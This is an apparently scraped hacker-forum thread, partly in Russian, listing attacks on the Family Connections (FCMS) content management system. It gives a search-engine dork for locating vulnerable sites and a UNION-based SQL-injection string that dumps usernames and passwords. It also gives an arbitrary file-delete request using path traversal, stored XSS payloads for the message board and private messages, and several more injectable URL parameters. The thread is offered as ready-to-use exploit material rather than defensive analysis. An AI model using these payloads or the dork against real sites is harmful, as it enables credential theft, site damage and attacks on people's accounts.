![]() |
Family Connections 1.1.2 Multiply Vulns
Family Connections 1.1.2 Multiply Vulns [*] Author : n3v3rh00d, http://forum.antichat.ru [*] Download : http://rubyforge.org/frs/download.php/7989/familyconnection-1.1.2.tar.gz [*] Dork : intitle:"powered by Family Connections 1.1.2" [*] Bug Type 1 : Remote Sql-injection [*] POC's : Код:
/gallery/index.php?uid=1&cid=-1+union+select+1,2,3,4,5,concat(username,char(64),password)+from+fcms_users/*&pid=1[*] Bug Type 2 : Arbitrary file delete [*] POC : /inc/upimages.php POST: delimg=&img=../../index.php |
Family Connections (FCMS)
site : www.familycms.com/ version cms : 2.1.2 (FCMS 2.1.2) download : www.familycms.com/downloads/index.php Active XSS 1. (тело письма) -- отправляем письмо пользователю с заголовком ( "><script>alert()</script> ) 2.messageboard.php -- в теме отправляем сообщение --- ("><script>alert(/xss/);</script>) условие (кто будет отвечать после сообщения со скриптом или просто "Reply" попадется на xss) SQL Injection 1. -- profile.php Код:
http://localhost/profile.php?member=[...][sql]Код:
http://localhost/calendar.php?entry=[...][sql]Код:
http://localhost/messageboard.php?thread=1[...][sql]Код:
http://localhost/gallery/index.php?uid=[..]&cid=[..]&pid=[..]sqlКод:
http://localhost/privatemsg.php?pm=[..][sql] |
FCMS
FCMS
version : 2.1.3 download : www.familycms.com/downloads/index.php ошибки которые остались после version 2.1.2 см. выше
Итак уязвимости найденные мною в версии 2.1.3
|
| Время: 09:49 |